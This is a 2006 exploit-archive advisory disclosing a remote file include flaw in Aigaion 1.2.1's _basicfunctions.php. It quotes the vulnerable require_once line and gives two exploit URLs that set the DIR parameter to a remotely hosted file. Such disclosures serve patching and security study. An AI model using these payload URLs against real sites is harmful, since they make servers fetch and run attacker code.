Aigaion <= 1.2.1 (DIR) Remote File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Aigaion <= 1.2.1 (DIR) Remote File Include Vulnerabilities
# Published : 2006-11-14
# Author : navairum
# Previous Title : ContentNow 1.30 (upload/xss) Multiple Remote Vulnerabilities
# Next Title : phpPeanuts 1.3 Beta (Inspect.php) Remote File Include Vulnerability

Software:Web based bibliography management system
Download link: http://sourceforge.net/projects/aigaion/
script:_basicfunctions.php
author: navairum

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The script _basicfunctions.php does not specify a value for the $DIR variable before including it.
Vulnerable code:

//if this script is not called from within one of the base pages, redirect to frontpage
require_once($DIR."checkBase.php");

/* This function leads the browser to the given location */

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit:
http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt?
http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt?

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# www.Syue.com [2006-11-14]